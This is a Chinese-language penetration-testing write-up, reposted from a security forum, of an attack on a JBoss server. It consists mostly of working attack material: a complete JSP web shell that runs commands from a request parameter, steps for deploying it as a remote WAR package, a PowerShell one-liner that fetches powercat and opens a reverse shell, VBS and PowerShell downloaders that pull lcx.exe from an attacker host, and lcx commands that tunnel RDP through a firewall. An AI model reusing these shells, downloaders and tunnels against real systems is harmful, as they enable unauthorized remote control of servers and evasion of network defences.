日期:
来源:潇湘信安收集编辑:whoamiaa
0x01 前言
0x02 信息收集
0x03 漏洞利用
1. 制作war包
<%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=big5"></head><body><%Runtime runtime = Runtime.getRuntime();Process process =null;String line=null;InputStream is =null;InputStreamReader isr=null;BufferedReader br =null;String ip=request.getParameter("cmd");try{process =runtime.exec(ip);is = process.getInputStream();isr=new InputStreamReader(is);br =new BufferedReader(isr);out.println("<pre>");while( (line = br.readLine()) != null ){out.println(line);out.flush();}out.println("</pre>");is.close();isr.close();br.close();}catch(IOException e ){out.println(e);runtime.exit(1);}%></body></html>
python -m SimpleHTTPServer 85892. 进入jboss.system页面找到如下,填入远程的war文件地址
0x04 进一步渗透
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmdhttps://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp赶紧看了哈…居然是 administrator 组的,那提权就不用了涩,但还是想3389连进去
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbsecho Set Shell = CreateObject("Wscript.Shell") >>download.vbsecho Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbsecho Post.Send() >>download.vbsecho Set aGet = CreateObject("ADODB.Stream") >>download.vbsecho aGet.Mode = 3 >>download.vbsecho aGet.Type = 1 >>download.vbsecho aGet.Open() >>download.vbsecho aGet.Write(Post.responseBody) >>download.vbsecho aGet.SaveToFile "C:\Windows\Temp\2.txt",2 >>download.vbs
powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:\Windows\Temp\2.txt')7. 当自己写进去了后,更名为exe执行的时候,被杀了,最后又看了下任务,才发现卡巴斯基,然后就一直被卡在这里
8. lcx命令如下
//被攻击机器lcx -slave 自己外网ip 51 内网ip 3389//攻击机器lcx.exe -listen 51 9090
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口.
lcx -tran 53 目标主机ip 33890x05 总结
虽然暂时没有成功,但从中还是学到许多渗透知识,也明白了实战能提高许多技术。不足就是知识不够,还需努力。
文章来源:先知社区(whoamiaa)原文地址:https://xz.aliyun.com/t/5326
关 注 有 礼
推 荐 阅 读